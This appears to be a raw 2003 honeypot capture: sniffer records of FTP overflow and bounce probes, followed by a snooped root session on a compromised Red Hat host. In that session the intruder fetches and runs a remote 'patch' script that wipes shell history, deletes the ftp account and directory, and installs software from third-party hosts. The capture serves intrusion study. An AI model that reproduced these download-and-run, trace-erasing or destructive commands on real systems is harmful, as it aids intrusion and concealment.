User-Agent: Mozilla/5.0 (compatible; MSIE 5.01; Win2000)
GET http://www.spedia.net/sp_login.htm HTTP/1.1
Host: www.spedia.net
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/5.0 (compatible; MSIE 5.01; Win2000)
----- [RST]
ACBA4604.ipt.aol.com => pc11 [21]
P
----- [RST]
ACBA4604.ipt.aol.com => pc11 [21]
PUSER anonymous
USER anonymous
PASS Xgpuser@home.com
PASS Xgpuser@home.com
----- [FIN]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
----- [FIN]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
USER anonymous
USER anonymous
PASS Ogpuser@home.com
PASS Ogpuser@home.com
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /upload/
CWD /upload/
MKD 030527012803p
MKD 030527012803p
RMD 030527012804p
RMD 030527012804p
SYST
SYST
REST 1
REST 1
PASV
PASV
PORT 207,46,133,140,1,21
PORT 207,46,133,140,1,21
CWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppppppppppppppppppppppppppppppppppppppCWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppp
----- [CAPLEN Exceeded]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
----- [CAPLEN Exceeded]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
USER anonymous
USER anonymous
PASS Sgpuser@home.com
PASS Sgpuser@home.com
CWD /_vti_pvt/
CWD /_vti_pvt/
CWD /upload/
CWD /upload/
MKD 030527025807p
MKD 030527025807p
RMD 030527025807p
RMD 030527025807p
SYST
SYST
REST 1
REST 1
CWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
ppppppppppppppppppppppppppppppppppppppppppppppppppppCWD pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp
pppppppppppppppppppppppppppppppppppppppppppppppppppp
----- [CAPLEN Exceeded]
218.86.9.51 => pc11 [23]
----- [CAPLEN Exceeded]
218.86.9.51 => pc11 [23]
----- [RST]
219.138.82.110 => pc11 [23]
----- [RST]
219.138.82.110 => pc11 [23]
----- [RST]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
----- [RST]
lns-th2-5f-81-56-233-225.adsl.proxad.net => pc11 [21]
USER anonymous
USER anonymous
PASS KN043623@cox.net
PASS KN043623@cox.net
CWD /upload/
CWD /upload/
DELE /upload/1mbtest.ptf
DELE /upload/1mbtest.ptf
TYPE I
TYPE I
PASV
PASV
STOR /upload/1mbtest.ptf
STOR /upload/1mbtest.ptf
----- [FIN]
172.186.70.4 => pc11 [21]
P
----- [FIN]
172.186.70.4 => pc11 [21]
P
----- [FIN]
61.237.20.82 => pc11 [23]
----- [FIN]
61.237.20.82 => pc11 [23]
-
�]0;@pc11: /usr/bin/.tux/tools/sniffer�[root@pc11 sniffer]# exit
bash-2.04$ exit
Back at local tty.
end at Sun Jun 8 17:18:27 HKT 2003
----------------------------------
Mon Jun 9 02:48:22 HKT 2003
================================
Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
1:45am up 5 days, 10:38, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
�]0;root@pc11: /root�[root@pc11 /root]# s� ���ps fax
PID TTY STAT TIME COMMAND
1 ? S 0:05 init [3]
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
4 ? SW 0:02 [kswapd]
5 ? SW 0:00 [kreclaimd]
6 ? SW 0:00 [bdflush]
7 ? SW 0:00 [kupdated]
8 ? SW< 0:00 [mdrecoveryd]
175 ? S 0:08 write
179 ? S 0:01 java
22669 ? S 0:00 \_ java
22671 ? S 0:00 \_ -tcsh
22698 ? S 0:00 \_ /sbin/bash
22700 p1 S 0:00 \_ /bin/bash
22767 p1 R 0:00 \_ ps fax
181 ? S 0:07 write
197 ? S 0:07 write
634 ? S 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
691 ? S 0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.m
771 ? S 0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
903 ? S 0:18 /usr/sbin/mysqld
926 ? S 0:07 write
928 1 S 0:00 /sbin/mingetty tty1
929 2 S 0:00 /sbin/mingetty tty2
930 3 S 0:00 /sbin/mingetty tty3
931 4 S 0:00 /sbin/mingetty tty4
935 5 S 0:00 /sbin/mingetty tty5
936 6 S 0:00 /sbin/mingetty tty6
975 ? S 0:00 mkdir tmp
7990 ? S 0:19 ./fam
8028 ? S 0:00 smbd -D
17090 ? S 0:00 sh -c "(swapd)" &
17099 ? T 0:00 \_ /sbin/modprobe -s -k -- binfmt-0000
17100 ? Z 0:00 \_ [modprobe ]
20938 ? S 0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
22658 ? S 0:00 syslogd -m 0
22666 ? S 0:00 klogd -2
22760 ? R 0:04 /bin/mingetty ttyp1
22761 ? S 0:00 /bin/number_cum -w 1 data1.dat 0011
�]0;root@pc11: /root�[root@pc11 /root]# w
1:45am up 5 days, 10:38, 0 users, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
�]0;root@pc11: /root�[root@pc11 /root]# cd � �� �� �����ls
�[01;34mcore�[00m �[01;34mlog�[00m �[01;34mmail�[00m �[00mx.pid�[00m
�]0;root@pc11: /root�[root@pc11 /root]# ls -a
�[01;34m.�[00m �[00m.bash_logout�[00m �[01;34m.ssh�[00m
�[01;34m..�[00m �[00m.bash_profile�[00m �[00m.tcshrc�[00m
�[00m.Xresources�[00m �[00m.bashrc�[00m �[01;34mcore�[00m
�[00m.addressbook�[00m �[00m.cshrc�[00m �[01;34mlog�[00m
�[00m.addressbook.lu�[00m �[00m.pine-interrupted-mail�[00m �[01;34mmail�[00m
�[00m.bash_history�[00m �[00m.pinerc�[00m �[00mx.pid�[00m
�]0;root@pc11: /root�[root@pc11 /root]# cd /e� �tx/nm�..
�]0;root@pc11: /root�[root@pc11 /root]# cd /etc/nmh/...
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# w
1:46am up 5 days, 10:40, 0 users, load average: 0.77, 0.26, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# wget snow.prohosting.com/~babiuc/patch.tgz
--01:46:45-- http://snow.prohosting.com/%7Ebabiuc/patch.tgz
=> `patch.tgz'
Connecting to snow.prohosting.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,693 [application/x-tar]
0K -> . [100%]
01:46:46 (1.61 MB/s) - `patch.tgz' saved [1693/1693]
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# tar xzvf patch.tgz
update/
update/Patch
update/patch/
update/patch/rh7.0
update/patch/rh7.1
update/patch/rh7.2
update/patch/rh6.2
update/patch/rh6.1
update/patch/rh6.0
update/patch/rh5.2
update/patch/rh7.3
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# cd update/
�]0;root@pc11: /etc/nmh/.../update�[root@pc11 update]# ./Patch
�[H�[2J
�[1;34m# �[1;32m Initialising patch sequence �[1;37m! �[1;34m#�[0m
�[1;34m# �[1;34m[Patching started on �[1;37mpc11�[0m]
�[1;34m# �[1;31m: linking /root/.bash_history to /dev/null �[1;34m#�[0m
�[1;34m# �[1;31m: linking /bin/.bash_history to /dev/null �[1;34m#�[0m
ln: creating symbolic link `/bin/.bash_history' to `/dev/null': Permission denied
�[1;34m# �[1;32m Redhat-release found ...looking for patches �[1;37m! �[1;34m#�[0m
�[1;34m
�[1;34m# �[0m Red Hat Linux release 7.1 (Seawolf) �[1;34m#�[0m
�[1;37m
�[1;34m# �[1;37m
Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686 �[1;34m#�[0m
�[1;35m
�[1;34m# �[1;35m
Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686 �[1;34m#�[0m
�[1;34m# �[1;31m: Patching Redhat �[1;33m7.1 �[1;34m #�[1;36m
Retrieving ftp://216.254.0.38/linux/redhat/7.1/en/os/i386/RedHat/RPMS/libpcap-0.4-39.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://216.254.0.38/linux/redhat/7.1/en/os/i386/RedHat/RPMS/wget-1.6-2.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://216.254.0.38/linux/redhat/7.1/en/powertools/i386/RedHat/RPMS/nmap-2.54BETA7-3.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/LPRng-3.7.4-23.1.i386.rpm
error: skipping ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/LPRng-3.7.4-23.1.i386.rpm - transfer failed - Unknown or unexpected error
Retrieving ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/openssh-3.1p1-5.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/bind-9.2.1-0.70.i386.rpm
error: skipping ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/bind-9.2.1-0.70.i386.rpm - transfer failed - Unknown or unexpected error
Retrieving ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/wu-ftpd-2.6.1-16.7x.1.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/bind-devel-9.2.1-0.70.i386.rpm
error: skipping ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/bind-devel-9.2.1-0.70.i386.rpm - transfer failed - Unknown or unexpected error
Retrieving ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/bind-utils-9.2.1-0.70.i386.rpm
error: skipping ftp://216.254.0.38/linux/redhat/updates/7.1/en/os/i386/bind-utils-9.2.1-0.70.i386.rpm - transfer failed - Unknown or unexpected error
�[1;34m# �[1;31m: Upgrading SENDMAIL, please wait a sec... �[1;34m#�[0m
�[1;34m# �[1;31m: Executing sendmail.rpm upgrade... �[1;34m#�[0m
�[1;36m
Retrieving ftp://18.29.1.67/linux/7/redhat/redhat-6.2/en/os/i386/RedHat/RPMS/sendmail-8.9.3-20.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://18.29.1.67/linux/7/redhat/redhat-6.2/en/os/i386/RedHat/RPMS/sendmail-cf-8.9.3-20.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
Retrieving ftp://18.29.1.67/linux/7/redhat/redhat-6.2/en/os/i386/RedHat/RPMS/sendmail-doc-8.9.3-20.i386.rpm
error: cannot open Packages index using db3 - No such file or directory (2)
error: cannot open Packages database in /var/lib/rpm
�[0m
�[1;34m# �[1;34m[Patching completed on �[1;37mpc11�[0m]
�]0;root@pc11: /etc/nmh/.../update�[root@pc11 update]# cd ..
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# /usr/sbin/userdel ftp
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# rm -rf /home/ftp
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# wget ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i3
86/SRPMS/wu-ftpd-2.6.1-20.src.rpm
--01:54:13-- ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i386/SRPMS/wu-ftpd-2.6.1-20.src.rpm
=> `wu-ftpd-2.6.1-20.src.rpm'
Connecting to ftp.redhat.com:21... connected!
Logging in as anonymous ...
Error in server greeting.
Retrying.
--01:54:15-- ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i386/SRPMS/wu-ftpd-2.6.1-20.src.rpm
(try: 2) => `wu-ftpd-2.6.1-20.src.rpm'
Connecting to ftp.redhat.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/redhat/linux/updates/7.2/en/os/i386/SRPMS ...
No such directory `pub/redhat/linux/updates/7.2/en/os/i386/SRPMS'.
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# lynx ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i3
86/SRPMS/wu-ftpd-2.6.1-20.src.rpm
�[?1048h�[?1047h�[1;24r�[4l�(B�)0�[m��[39m�[49m�[1;24r�[H�[2J�[22;1H�[1m�[33m�[44mGetting ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i386/SRPMS/wu-
Looking up ftp.redhat.com�[m��[39m�[49m�[K
�[1m�[33m�[44mMaking FTP connection to ftp.redhat.com
Can't Access `ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i386/SRP
Alert!: Unable to access document.�[m��[39m�[49m�[K
�[m��[39;49m
�[K�[?1047l�[?1048l
Looking up ftp.redhat.com
Making FTP connection to ftp.redhat.com
Can't Access `ftp://ftp.redhat.com/pub/redhat/linux/updates/7.2/en/os/i386/SRPMS/wu-ftpd-2.6.1-20.src.rpm'
Alert!: Unable to access document.
lynx: Can't access startfile
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# cat /ew� �tc/issue
Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# lynx ftp://updates.redhat.com/7.1/en/os/SRPMS/wu-ftpd-2.6.1-16.
7x.1.src.rpm
�[?1048h�[?1047h�[1;24r�[4l�(B�)0�[m��[39m�[49m�[1;24r�[H�[2J�[22;1H�[1m�[33m�[44mGetting ftp://updates.redhat.com/7.1/en/os/SRPMS/wu-ftpd-2.6.1-16.7x.1.src.rpm
Looking up updates.redhat.com�[m��[39m�[49m�[K
�[1m�[33m�[44mMaking FTP connection to updates.redhat.com
Looking up updates.redhat.com�[m��[39m�[49m�[K
�[1m�[33m�[44mMaking FTP connection to updates.redhat.com
Can't Access `ftp://updates.redhat.com/7.1/en/os/SRPMS/wu-ftpd-2.6.1-16.7x.1.s
Alert!: Unable to access document.�[m��[39m�[49m�[K
�[m��[39;49m
�[K�[?1047l�[?1048l
Looking up updates.redhat.com
Making FTP connection to updates.redhat.com
Looking up updates.redhat.com
Making FTP connection to updates.redhat.com
Can't Access `ftp://updates.redhat.com/7.1/en/os/SRPMS/wu-ftpd-2.6.1-16.7x.1.src.rpm'
Alert!: Unable to access document.
lynx: Can't access startfile
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# lynbx � �� �� �x http://www.megaloman.com/~hany/_data/SRPM/doors3.1/wu-ftpd
-2.6.1-20.src.rpm
�[?1048h�[?1047h�[1;24r�[4l�(B�)0�[m��[39m�[49m�[1;24r�[H�[2J�[22;1H�[1m�[33m�[44mGetting http://www.megaloman.com/~hany/_data/SRPM/doors3.1/wu-ftpd-2.6.1-20.sr
Looking up www.megaloman.com�[m��[39m�[49m�[K
�[1m�[33m�[44mMaking HTTP connection to www.megaloman.com
Sending HTTP request.�[m��[39m�[49m�[K
�[1m�[33m�[44mHTTP request sent; waiting for response.
Read 1.4 KB of data, 200 bytes/sec.�[m��[39m�[49m�[K
�[1m�[33m�[44mHTTP/1.0 200 OK�[m��[39m�[49m�[K
�[1m�[33m�[44mapplication/x-rpm D)ownload, or C)ancel
Content-type: application/x-rpm�[m��[39m�[49m�[K
�[1m�[33m�[44mRetrieving file. - PLEASE WAIT -�[22;3Had 108 of 314 KB of data, 257 KB/sec.�[22;7H14�[20C13�[22;40H�[22;7H29�[21C04�[22;40H�[22;7H45�[20C88 KB/sec.�[m��[39m�[49m�[K�[22;7H�[1m�[33m�[44m63�[20C79�[22;39H�[22;7H78�[21C1�[22;39H�[22;7H95�[20C68�[22;39H�[22;6H214�[21C5�[22;39H�[22;7H31�[21C2�[22;39H�[22;7H48�[21C0�[22;39H�[22;7H65�[20C58�[22;39H�[22;7H79�[21C6�[22;39H�[22;7H98�[21C5�[22;39H�[22;6H313�[21C4�[22;39H
Data transfer complete�[m��[39m�[49m�[K�[1;63H�[1K Download Options�[3;18H�[1K Download Options (Lynx Version 2.8.4dev.16)
�[4m�[35m�[49mDownloaded link:�[m��[39m�[49m http://www.megaloman.com/~hany/_data/SRPM/doors3.1/wu-ftpd-2.6�[6;1H.1-20.src.rpm
�[4m�[35m�[49mSuggested file name:�[m��[39m�[49m wu-ftpd-2.6.1-20.src.rpm
Standard download options:�[10;4H�[34mSave to disk
�[39mLocal additions:�[13;4H�[34mView with less�[21;1H�[23;3H�[39mArrow keys: Up and Down to move. Right to follow a link; Left to go back.�[24;2HH)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list�[22;1H�[1m�[33m�[44mCommands: Use arrow keys to move, '?' for help, 'q' to quit, '<-' to go back.�[10;4H�[m��[31m�[49mSave to disk�[24;80H�[22;1H�[1m�[33m�[44mEnter a filename: �[m��[39m�[49m�[Kwu-ftpd-2.6.1-20.src.rpm
�[1m�[33m�[44mSaving...�[m��[39m�[49m�[K
�[m��[39;49m
�[K�[?1047l�[?1048l�[?1048h�[?1047h�[1;24r�[4l�(B�)0�[m��[39m�[49m�[1;24r�[H�[2J�[1;63H�[1K Download Options�[3;18H�[1K Download Options (Lynx Version 2.8.4dev.16)
�[4m�[35m�[49mDownloaded link:�[m��[39m�[49m http://www.megaloman.com/~hany/_data/SRPM/doors3.1/wu-ftpd-2.6�[6;1H.1-20.src.rpm
�[4m�[35m�[49mSuggested file name:�[m��[39m�[49m wu-ftpd-2.6.1-20.src.rpm
Standard download options:�[10;4H�[34mSave to disk
�[39mLocal additions:�[13;4H�[34mView with less�[21;1H�[23;3H�[39mArrow keys: Up and Down to move. Right to follow a link; Left to go back.�[24;2HH)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list�[22;1H�[1m�[33m�[44mCommands: Use arrow keys to move, '?' for help, 'q' to quit, '<-' to go back.�[10;4H�[m��[31m�[49mSave to disk�[24;80H�[22;1H�[1m�[33m�[44mAre you sure you want to quit? (y) �[m��[39m�[49m�[K�[24;2H�[K
�[m��[39;49m
�[K�[?1047l�[?1048l�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# tar x=� �� �� �� �� �� ��ls
�[01;34mcuratare�[00m �[01;34mupdate�[00m �[01;32mwrite�[00m
�[01;31mpatch.tgz�[00m �[01;34mussl�[00m �[01;31mwu-ftpd-2.6.1-20.src.rpm�[00m
�[01;32mread�[00m �[01;31mussla.tgz�[00m
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# rpm -force -H� �hu� �Uv wu-ftpd-2.6.1-20.src.rpm
-force: unknown option
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# rpm -force -hUv wu-ftpd-2.6.1-20.src.rpm���������[1@~
[root@pc11 ...]# ��[1@~��[1Prpm -force -hUv wu-ftp
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# rm� �pm --force -hUv wu-ftpd-2.6.1-20.~src.rpm
error: cannot open file wu-ftpd-2.6.1-20.~src.rpm: No such file or directory
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# rpm --force -hUv wu-ftpd-2.6.1-20.src.rpm